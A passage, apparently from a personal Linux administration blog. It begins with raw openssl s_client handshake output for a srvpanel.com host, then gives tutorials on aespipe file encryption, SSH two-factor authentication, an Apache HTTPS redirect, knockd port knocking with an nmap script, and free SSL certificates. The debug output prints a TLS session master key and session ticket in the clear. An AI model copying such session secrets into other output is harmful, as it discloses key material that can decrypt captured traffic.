depth=1 C = GB, ST = Greater Manchester, L = Salford, O = COMODO CA Limited, CN = COMODO RSA Domain Validation Secure Server CA
verify return:1
depth=0 OU = Domain Control Validated, OU = PositiveSSL Wildcard, CN = *.srvpanel.com
verify return:1
read from 0xee8a60 [0xf2cc53] (5 bytes => 5 (0x5))
0000 - 16 03 03 01 91                                    .....
read from 0xee8a60 [0xf2cc58] (401 bytes => 401 (0x191))
0000 - 0c 00 01 8d 03 00 19 85-04 00 56 f3 fd d8 97 68   ..........V....h
0010 - 10 31 ba b8 aa 73 dc 47-57 0e 9b 5f c5 43 18 f8   .1...s.GW.._.C..
0020 - 9c 21 06 4f 1f c3 e1 0c-f7 d5 16 0b 2c bc 5c 1b   .!.O........,.\.
0030 - 30 62 7a 6f 52 29 07 0a-80 09 32 30 c9 e0 38 d1   0bzoR)....20..8.
0040 - 12 f8 9a f5 da 1f 07 b2-5d df c6 01 5f cf 57 07   ........]..._.W.
0050 - bc 5c df 3e d1 a0 df e4-fa dc 23 45 65 84 fe 46   .\.>......#Ee..F
0060 - f2 d0 03 d4 16 b1 06 ee-27 39 1b a8 d6 73 4e 65   ........'9...sNe
0070 - 96 f0 5c ab 07 9e 09 cf-59 49 f3 45 05 8f e8 d9   ..\.....YI.E....
0080 - e8 09 92 83 de c6 90 54-a5 85 4e 84 fb 06 01 01   .......T..N.....
0090 - 00 c0 54 d8 59 e9 5a fd-08 19 31 85 e8 42 19 01   ..T.Y.Z...1..B..
00a0 - 06 d6 ff d8 d6 d5 f9 ba-8b 90 1c 90 9d e5 05 ed   ................
00b0 - 1f 03 e1 89 c0 14 9e ca-fd 49 77 57 da 22 d1 59   .........IwW.".Y
00c0 - 15 37 c3 68 01 f3 18 79-8a df 13 3a c8 08 21 93   .7.h...y...:..!.
00d0 - 87 4a b3 98 ee 09 fb 66-58 54 6c 35 d6 64 fc 03   .J.....fXTl5.d..
00e0 - 86 80 79 42 8b 96 d7 af-08 53 94 66 f8 07 fd 91   ..yB.....S.f....
00f0 - 35 5a 03 38 00 06 07 95-91 0f 20 05 ac 65 0b 0f   5Z.8...... ..e..
0100 - dc 74 b9 53 d6 b9 88 96-82 d8 d7 a3 f9 69 38 ea   .t.S.........i8.
0110 - ab 1d 14 be 18 ef 9b ab-b6 da ca 31 5a 88 81 d5   ...........1Z...
0120 - 61 e6 e8 07 7f ae 09 94-9f 28 5b f9 34 f3 f7 28   a........([.4..(
0130 - f0 0f bc 54 99 68 f1 cb-31 7e 00 94 2b fc e9 d9   ...T.h..1~..+...
0140 - 67 85 a0 9b b6 14 27 7c-34 66 d3 ef c2 d2 7b 29   g.....'|4f....{)
0150 - 87 ee 41 64 10 f8 a4 56-50 cb 50 26 52 94 80 c7   ..Ad...VP.P&R...
0160 - 87 cc 19 ea 91 df 51 3d-20 ce bc 84 b4 0b c9 71   ......Q= ......q
0170 - 1f 0f 54 af b2 12 0a e0-6a 1f 7e 0c c5 ec 40 85   ..T.....j.~...@.
0180 - 08 f1 a4 74 e9 39 2a f6-9f e6 75 70 03 94 64 42   ...t.9*...up..dB
0190 - 91                                                .
read from 0xee8a60 [0xf2cc53] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 04                                    .....
read from 0xee8a60 [0xf2cc58] (4 bytes => 4 (0x4))
0000 - 0e                                                .
0004 - <SPACES/NULS>
write to 0xee8a60 [0xf368c0] (143 bytes => 143 (0x8F))
0000 - 16 03 03 00 8a 10 00 00-86 85 04 01 b2 d4 41 bf   ..............A.
0010 - cc cd 76 19 68 fb f1 ff-a4 25 55 86 d3 77 56 6d   ..v.h....%U..wVm
0020 - 9d c4 c1 7c 74 9d d5 34-b2 2e 1b f2 b4 e6 8f 4c   ...|t..4.......L
0030 - a8 06 cb 0f 68 a4 fd da-63 98 fc 25 71 a5 94 63   ....h...c..%q..c
0040 - d0 c1 3c ce f0 12 5b 6c-03 71 42 df 2f 00 0e bf   ..<...[l.qB./...
0050 - e8 20 2f 82 a1 4a 04 e9-cc f5 a0 67 0e b7 f8 68   . /..J.....g...h
0060 - 81 ed 35 c6 66 a8 4e 87-e7 2d 31 f0 7e 3d c4 ce   ..5.f.N..-1.~=..
0070 - e2 e8 dc 45 3d 5f 8b b6-97 f2 8d 0c bf 0a da 47   ...E=_.........G
0080 - 22 7c 8a 5d 6d d5 52 33-92 50 f7 50 35 99 af      "|.]m.R3.P.P5..
write to 0xee8a60 [0xf368c0] (6 bytes => 6 (0x6))
0000 - 14 03 03 00 01 01                                 ......
write to 0xee8a60 [0xf368c0] (45 bytes => 45 (0x2D))
0000 - 16 03 03 00 28 ed e1 55-b3 e9 d4 a3 51 79 e6 0e   ....(..U....Qy..
0010 - 14 aa 7c 13 a6 a3 52 9e-b8 4f 6b 95 72 ce 0a c4   ..|...R..Ok.r...
0020 - 5f d4 01 71 8d b5 dd e2-8b cd e9 de df            _..q.........
read from 0xee8a60 [0xf2cc53] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 ca                                    .....
read from 0xee8a60 [0xf2cc58] (202 bytes => 202 (0xCA))
0000 - 04 00 00 c6 00 00 01 2c-00 c0 9e 53 e7 1f ab 1a   .......,...S....
0010 - ec cf bf bf 04 ef c5 10-85 af cb 42 09 95 30 1a   ...........B..0.
0020 - c8 1b 93 e5 3d 24 58 d9-e9 7e cb 4f 72 1e 68 36   ....=$X..~.Or.h6
0030 - 1b fb 7e 63 cc 4d 81 fe-2b 77 b0 1e a2 3f 52 e9   ..~c.M..+w...?R.
0040 - 53 b6 32 56 e2 ee 7a ee-4f b8 31 4a 17 8f 66 f0   S.2V..z.O.1J..f.
0050 - 89 b9 ad 36 d4 8b d4 5a-8c 74 e6 76 f5 f2 39 a1   ...6...Z.t.v..9.
0060 - 56 a3 e3 d4 c0 02 40 c3-e3 45 9e a3 da 1f 08 70   V.....@..E.....p
0070 - 13 97 eb b1 c2 47 7b 1c-11 1c aa 04 bb eb f4 e5   .....G{.........
0080 - a9 af 4e 5d 23 0c dd 1b-2f 92 ed 14 1d 91 aa f1   ..N]#.../.......
0090 - 20 3b bf 91 6a 13 fc 77-44 9f 30 d8 d9 d0 a7 9b    ;..j..wD.0.....
00a0 - 31 e6 55 90 de 9c 42 db-0a da a3 09 2d 3f 27 59   1.U...B.....-?'Y
00b0 - b8 3d cc d4 42 3c 71 21-09 14 39 fb 95 d9 39 4a   .=..B<q!..9...9J
00c0 - 46 46 e5 15 fa 0e d9 e9-cc a6                     FF........
read from 0xee8a60 [0xf2cc53] (5 bytes => 5 (0x5))
0000 - 14 03 03 00 01                                    .....
read from 0xee8a60 [0xf2cc58] (1 bytes => 1 (0x1))
0000 - 01                                                .
read from 0xee8a60 [0xf2cc53] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 28                                    ....(
read from 0xee8a60 [0xf2cc58] (40 bytes => 40 (0x28))
0000 - dd 5e 50 38 49 b2 c4 da-df 2a f9 bf 73 c5 14 ea   .^P8I....*..s...
0010 - 99 6a 84 04 ad c9 d8 59-1c a9 8a 60 79 09 c9 80   .j.....Y...`y...
0020 - 17 af 3b e0 65 cf d1 b8-                          ..;.e...
---
Certificate chain
 0 s:/OU=Domain Control Validated/OU=PositiveSSL Wildcard/CN=*.srvpanel.com
   i:/C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO RSA Domain Validation Secure Server CA
 1 s:/C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO RSA Domain Validation Secure Server CA
   i:/C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO RSA Certification Authority
 2 s:/C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO RSA Certification Authority
   i:/C=SE/O=AddTrust AB/OU=AddTrust External TTP Network/CN=AddTrust External CA Root
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIFUTCCBDmgAwIBAgIQFP9G1lSwJmKOj74JxKsrFjANBgkqhkiG9w0BAQsFADCB
kDELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4G
A1UEBxMHU2FsZm9yZDEaMBgGA1UEChMRQ09NT0RPIENBIExpbWl0ZWQxNjA0BgNV
BAMTLUNPTU9ETyBSU0EgRG9tYWluIFZhbGlkYXRpb24gU2VjdXJlIFNlcnZlciBD
QTAeFw0xNjExMjUwMDAwMDBaFw0xOTEyMDgyMzU5NTlaMFsxITAfBgNVBAsTGERv
bWFpbiBDb250cm9sIFZhbGlkYXRlZDEdMBsGA1UECxMUUG9zaXRpdmVTU0wgV2ls
ZGNhcmQxFzAVBgNVBAMMDiouc3J2cGFuZWwuY29tMIIBIjANBgkqhkiG9w0BAQEF
AAOCAQ8AMIIBCgKCAQEAw3HUKPFmPF5nXqDP2txXkVPXyDJqIuj8gt/zCc5lMe1Q
yRjr0FjHlMpTuYfkyE3UoJtAw/AFOLkbM+gVFzRMCGG0hFtOOIb135rqY6Juwf5x
Zid7xuOa6RnSIq8Wb6mUzJh9Bu4t4mwye2k7a3/tJHDIB9QI2NCTj/B1f5ymI/RS
r65r2XU9PJkYkaAjTr5uBfewiUbEGw6NTchEf6IhUaawb/UfshmW78XCn/YmY6HZ
yGg1IvGAlh4L7OBNnHqCdAUhrD73znPOvdN95bCmSBeUDaCqWAygw/xKXt6UIzJK
SW47U7wtLZqFsQdmNNHlQ1eCvnvyukh3LIcVQkBo4QIDAQABo4IB2TCCAdUwHwYD
VR0jBBgwFoAUkK9qOpRaC9iQ6hJWc99DtDoo2ucwHQYDVR0OBBYEFN9UDXmzWMUC
tk8Nsq+UR52ap/dwMA4GA1UdDwEB/wQEAwIFoDAMBgNVHRMBAf8EAjAAMB0GA1Ud
JQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjBPBgNVHSAESDBGMDoGCysGAQQBsjEB
AgIHMCswKQYIKwYBBQUHAgEWHWh0dHBzOi8vc2VjdXJlLmNvbW9kby5jb20vQ1BT
MAgGBmeBDAECATBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vY3JsLmNvbW9kb2Nh
LmNvbS9DT01PRE9SU0FEb21haW5WYWxpZGF0aW9uU2VjdXJlU2VydmVyQ0EuY3Js
MIGFBggrBgEFBQcBAQR5MHcwTwYIKwYBBQUHMAKGQ2h0dHA6Ly9jcnQuY29tb2Rv
Y2EuY29tL0NPTU9ET1JTQURvbWFpblZhbGlkYXRpb25TZWN1cmVTZXJ2ZXJDQS5j
cnQwJAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmNvbW9kb2NhLmNvbTAnBgNVHREE
IDAegg4qLnNydnBhbmVsLmNvbYIMc3J2cGFuZWwuY29tMA0GCSqGSIb3DQEBCwUA
A4IBAQBGVHjnQGuJY6GN5csnCI8qnQ20wAN1ywxlRwAEaqlCquYiE/vEln0PVEHB
ILqspeexxLenAkp332re9+SvAGi+MnLIKFf2ivXEva+oaCYGxFteJhhCXcY3fLGK
h3MXGlFHmS96/x4H9qT/JOa8Lb1hsc13AXMulPAht5XUg2qr7OpOP3BHK96aKv2+
Psi7mxm1Ao1fLLvbSLnZmsEiZO1WmrIqLoQ3ni6/7XbLKBLDeuyi74+gU6bsrVIa
ibsiqNm288VJBS+I8ubrVs6iCM6hmjprQQfRhORYSMXSN2VEnjW37pAfaUNyW98o
f4g0WuBnUdl+jWf/ZnFhEcz5jUbm
-----END CERTIFICATE-----
subject=/OU=Domain Control Validated/OU=PositiveSSL Wildcard/CN=*.srvpanel.com
issuer=/C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO RSA Domain Validation Secure Server CA
---
No client certificate CA names sent
Server Temp Key: ECDH, secp521r1, 521 bits
---
SSL handshake has read 5078 bytes and written 441 bytes
---
New, TLSv1/SSLv3, Cipher is ECDHE-RSA-AES256-GCM-SHA384
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : ECDHE-RSA-AES256-GCM-SHA384
    Session-ID: 38C659794CB827A3F7D87F7B0C99F8C328DD73D1B3579430BD13E1FDD0EAA771
    Session-ID-ctx:
    Master-Key: D89CC439220474EF3F3CE92879D7B4F58E764446B0119D3809DE4EF87DE014F245BD396FEAB424E827D74DF630EB4A49
    Key-Arg   : None
    Krb5 Principal: None
    PSK identity: None
    PSK identity hint: None
    TLS session ticket lifetime hint: 300 (seconds)
    TLS session ticket:
    0000 - 9e 53 e7 1f ab 1a ec cf-bf bf 04 ef c5 10 85 af   .S..............
    0010 - cb 42 09 95 30 1a c8 1b-93 e5 3d 24 58 d9 e9 7e   .B..0.....=$X..~
    0020 - cb 4f 72 1e 68 36 1b fb-7e 63 cc 4d 81 fe 2b 77   .Or.h6..~c.M..+w
    0030 - b0 1e a2 3f 52 e9 53 b6-32 56 e2 ee 7a ee 4f b8   ...?R.S.2V..z.O.
    0040 - 31 4a 17 8f 66 f0 89 b9-ad 36 d4 8b d4 5a 8c 74   1J..f....6...Z.t
    0050 - e6 76 f5 f2 39 a1 56 a3-e3 d4 c0 02 40 c3 e3 45   .v..9.V.....@..E
    0060 - 9e a3 da 1f 08 70 13 97-eb b1 c2 47 7b 1c 11 1c   .....p.....G{...
    0070 - aa 04 bb eb f4 e5 a9 af-4e 5d 23 0c dd 1b 2f 92   ........N]#.../.
    0080 - ed 14 1d 91 aa f1 20 3b-bf 91 6a 13 fc 77 44 9f   ...... ;..j..wD.
    0090 - 30 d8 d9 d0 a7 9b 31 e6-55 90 de 9c 42 db 0a da   0.....1.U...B...
    00a0 - a3 09 2d 3f 27 59 b8 3d-cc d4 42 3c 71 21 09 14   ..-?'Y.=..B<q!..
    00b0 - 39 fb 95 d9 39 4a 46 46-e5 15 fa 0e d9 e9 cc a6   9...9JFF........

    Start Time: 1496764695
    Timeout   : 300 (sec)
    Verify return code: 0 (ok)
---

 

 

 

Encrypting with aespipe

Hi folks!

It has been long time that I did not post anything on my blog.  Actually, I set sail for new adventure, new job– I will move to Wrocław, Poland. So I have many things to do. Anyway.

In this post, I write about encrypting a file in Linux. Actually, there are many command line tools for this. In this post I will write about aespipe. Aespipe is a command line tool that can be used to create and restore tar or cpio archives. aespipe encrypts and decrypts block of data.

Installing aespipe.

#yum install epel-release -y

#yum install aespipe -y

Creating Secret Key

Next thing is creating a secret key to encrypt our secret message. Actually, there is many ways to it on Linux.  Just pick one of below to create a secret key. Actually, Here my secret key is just a 20 characters you can increase or decrease its size.

$tr -dc [:alnum:] < /dev/urandom | head -c 20 > secret.key

or

$openssl rand -hex 20 > secret.key

Encrypt your file or your block disk.

You can encrypt your secret.txt file.

$cat secret.txt
“If you're going to try, go all the way. Otherwise, don't even start. This could mean losing girlfriends, wives, relatives and maybe even your mind. It could mean not eating for three or four days. It could mean freezing on a park bench. It could mean jail. It could mean derision. It could mean mockery--isolation. Isolation is the gift. All the others are a test of your endurance, of how much you really want to do it. And, you'll do it, despite rejection and the worst odds. And it will be better than anything else you can imagine. If you're going to try, go all the way. There is no other feeling like that. You will be alone with the gods, and the nights will flame with fire. You will ride life straight to perfect laughter. It's the only good fight there is.”
$aespipe -e AES256 -C128 -P secret.key < secret.txt > encrypted.msg

Output of encrypted.msg file with less command.

j^WE\<97>.^B<B2>^C'wq<F8>^]<F9>9<F0><90><CB>^G<EA>p<A6><F3>m`^F*\<BA>^BJ<D5>E'^K<82>T^PK"^O$l^L٥<D5>9(T8<8D><DA><FD><A2><FB>NE^V
<E0>C<EE><AD><DA>V<E6>7^Y3V<8D>.=qא<B0>u:^<B6>W˖4np<AF>.=<EC>b<CA>}<[<FC>s<8C><86><A5>^A<E1><FC><F3>DŽ<CC><F3><CB>,<EA><DB>j}<87>
<DC>Oj6<D4>o<A4><D2>}<B6>38X<B2><F7>^z<AE>^@<B9>`<F2><B5><E1><A6><U+A06F2><96><B4><A8>=<C5>0,<94>X6<9B>^T^AO<E9><83>}<EB><96>Š^GX
^UrT`<ED>^Ss1<BD><A3>^?<C5><C4><E6><DA>z㔽<ED>^_<A9>^\^M<ED>*<B0>S<C1><A4><E3>c<97><FC>a<98><B6><DE>^^<D2>tON<A5><91>._<F7><8C>
<FE><AC>3<93>.^DPESC*<B7><C0><AB><FB>^O<D9>^@<FE><FB>^X<91><86>3<E9>[W<95>t<F7><A7>3<B2>[<90><AE>ف<EE>kU<BC>^D<C4><E2>  ʟ<AC><F3>
<EA><EF><FC><C0><FC>3<C5>ESCLy<A7>JZ<E6><<C2>2][h<99>H^EѬ^?У^C<D1>_<C9>ۮ<8B>b<EE>^T<F0>^H%#<AE>S<DA>;<82><85>R<BB><D5>^\J<98><B1>
<C0><DD>$2<E9><F8><91>Yb<B5>^V><D3>|it<D7><DC><E5>^@^Dv>^B<A3>
<D9><DF><EE><CB>d^D^Ks^<CE>H<BB><BF><F8>Y<93><9C><A9><97><D5><E2><9D><E1><89>^M<99>^\b9<F4><A5>^^^V<AB>ok<BC><A0><CC>D<C2>j<AA>3

To decrypt it.

$aespipe -d -e AES256 -C128 -P secret.key < encrypted.msg > message.txt

You can also encrypt and decrypt tar file with the same way.

Encrypt tar file.

$tar cvf  - secret.txt | aespipe -e AES256 -C128 -P secret.key  > secret.tar.sec

Decrypt tar file

$aespipe -d -e AES256 -C128 -P secret.key < secret.tar.sec | tar xvf -

For more information.

$man aespipe

 

 

 

 

 

SSH Two-Factor Authentication

Hi Folks!

Proliferation of the Internet changes our life that almost anything demands for the Internet. Our personal information, bank accounts, Company’ secrets etc.. So, how we protect our computer systems from intruders ? As you know most common method is password authentication. But People are so inclined to use short passwords. Brute-Force methods prevails it. So, We need additional authentication information beside password. One of them is Two-Factor authentication. And it has different kind of versions. In this post we will use OTP which generates code from  time-synchronization. So Time accuracy is important. To do so, my host pulls time from reliable NTP servers.

Install necessary Packages.

You  have to be root user to  install necessary packages.

#yum install google-authenticator

Run google-authenticator

Now, You can switch your normal account. And run google-authenticator command on a shell. It will ask you a couple of questions. You can see the picture. (Figure-1)

                                                            Figure-1 It creates a QR code

                                      Figure-2 It asks a couple of options to configure

Install Google Authenticatior on Your Android Phone

You also need to install Google Authenticator Application on your Android phone. Run the application and scan the QR code that we have already created it by running google-authenticator command on the shell.(Figure-1)

Figure-3 Google Authenticatior Android Application

Configuration of google-authenticator for SSH.

We will use two-factor authentication for SSH protocol. So we need to add google-authenticator pam module. Add the line below top of the sshd file on the path /etc/pam.d

auth required pam_google_authenticator.so

Configure sshd_config File

Edit your sshd_config file on the path /etc/ssh and change one option from “ChallengeResponseAuthentication no” to “ChallengeResponseAuthentication yes”

ChallengeResponseAuthentication yes

Restart SSH service

systemctl restart sshd.service

Test Time!

Now try to login to the host that you configured for Two-Factor authentication. You can see that I also need a verification code.

      Figure-3 It asks me verification code beside password.

 

 

Redirecting http to https

Do you have  a SSL certificated web site and your audience still connects you via  http because of their habit ? Easy way to handle this problem is redirecting http requests to https. By doing that any http requests are redirected to the https. To do that we will use Apache web server (httpd RHEL,CentOS).

Apache is the world’s most used web server software. It has many features loadbalancing, cgi support, headers and content rewriting, URL rewriting etc,. In this post we will use URL rewriting capability of Apache, which is supported by mod_rewrite.

mod_rewrite module provides flexible and powerful way to URLs using an unlimited number of rules. By default, mod_rewrite maps a URL to a filesystem path. However, it can also be used to redirect one URL to another URL, or to invoke an internal proxy fetch.

You can add the configuration below either .htacces or apache2.conf (httpd.conf on RHEL, CentOS).

#Redirect permanently any request, which comes from Port 80(http) to https.
<IfModule mod_rewrite.c>
RewriteCond %{SERVER_PORT} 80
RewriteRule ^(.*)$ https://manintheit.org/$1 [R=301,L]
</IfModule>

Do not forget to enable mod_rewrite module. You can check with apache2ctl or httpd utility.

On Debian, Ubuntu system.

root@debian:/etc/apache2# apache2ctl -M|grep rewrite

On RHEL, CentOS system.

[root@centos7 media]# httpd -M| grep rewrite

You can track the requests http to https with curl -v.

redirection

 

 

 

 

 

 

Port Knocking

Port knocking is one of hardening method to prevent unauthorized user access the services. This method ability to externally open ports that, by default, keep closed by firewall. It works by sending  TCP packets to predefined closed ports in right order. In my virtual environment, I have two Linux based systems one is Debian8 and the other is Centos7.

Debian8(Server):

IP:192.168.17.139

Services:knockd,ssh

Centos7(client):

IP:192.168.17.135

Services:ssh

I closed ssh port accessing anywhere except for my current connection to configure knockd service on Debian8.

root@debian:~# iptables -A INPUT -p tcp --dport 22 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
root@debian:~# iptables -A INPUT -p tcp --dport 22 -j REJECT

Installing knockd service :

root@debian:~# apt-get install knockd

Configuration of knockd service:

First we need to activate knockd service by configuring  parameter START_KNOCKD=0 to  START_KNOCKD=1 on /etc/default/knockd file.(Figure-1)

knockd

 

 

 

 

 

Figure-1

After that, we configure consecutive of ports to be used and what TCP packet will be send, before open  SSH port file by editing /etc/knockd.conf  file.(Figure-2)

knockd2

Figure-2

According to configuration Figure-2 – To open SSH port, we have to  send TCP SYN packet for each port 7000, 8000, 9000 in order which is not more than 50 seconds. To close SSH port, we have to  send TCP SYN packet for each  port 9000, 8000, 7000 in order which is not more than 50 seconds.

Enabling knockd service:(It will also start after reboot)

root@debian:~# systemctl enable knockd.service

Starting knockd service:

root@debian:~# systemctl start knockd.service

To send a TCP SYN packet for specific ports you can use nmap network utility. Below you can find shell script to do that.

Make sure that nmap is installed on your system. If It is not, you can install as it below.

#For Debian System
apt-get install nmap
#For Redhat,Centos System
yum install nmap

Usage:

./portKnock.sh <IP> <open,close>

./portKnocking.sh 192.168.17.139 open

./portKnocking.sh 192.168.17.139 close

#!/bin/bash
IP=$1
choose=$2
count=$#
echo $count
if [[ count -eq 2 ]] ; then
case $choose in
	open) 
		echo "---opening ports for $IP"
		for port in 7000 8000 9000 
		do
			echo "sending SYN for port $port"
			nmap -v -PS --disable-arp-ping -p $port $IP
			
		done

		;;
	
	close)
		echo "---closing ports for $IP"
		for port in 9000 8000 7000 
		do
			echo "sending SYN for port $port"
			nmap -v -PS --disable-arp-ping -p $port $IP
		done
		;;
	*)
	esac
else
		echo "Wrong usage... ./portKnock.sh <IP> <open/close>"
fi

Syslog:

./portKnocking.sh 192.168.17.139 open

Nov 27 11:52:23 debian knockd: 192.168.17.135: openSSH: Stage 1
Nov 27 11:52:23 debian knockd: 192.168.17.135: openSSH: Stage 2
Nov 27 11:52:23 debian knockd: 192.168.17.135: openSSH: Stage 3
Nov 27 11:52:23 debian knockd: 192.168.17.135: openSSH: OPEN SESAME
Nov 27 11:52:23 debian knockd: openSSH: running command: /sbin/iptables -I INPUT 1 -s 192.168.17.135 -p tcp --dport 22 -j ACCEPT

./portKnocking.sh 192.168.17.139 close

Nov 27 11:53:32 debian knockd: 192.168.17.135: closeSSH: Stage 1
Nov 27 11:53:32 debian knockd: 192.168.17.135: closeSSH: Stage 2
Nov 27 11:53:32 debian knockd: 192.168.17.135: closeSSH: Stage 3
Nov 27 11:53:32 debian knockd: 192.168.17.135: closeSSH: OPEN SESAME
Nov 27 11:53:32 debian knockd: closeSSH: running command: /sbin/iptables -D INPUT -s 192.168.17.135  -p tcp --dport 22 -j ACCEPT

For more information about port knocking you can visit http://www.zeroflux.org/projects/knock

Happy Hardening.

 

 

Free SSL Certificate

Q: Is is possible to get free SSL certificate, which is supported by modern web browsers such as Chrome, Mozilla Firefox, IE etc,.

A: Actually, yes you can have free green bar SSL certificates which is supported by modern web browsers. Let’s Encrypt is a free, automated, open Certificate Authority. But before you have SSL certificate, It requires some of the things you have to do to confirm you are the owner of domain that you want to get SSL certificate. There are some web sites to direct you, https://www.sslforfree.com is one of them.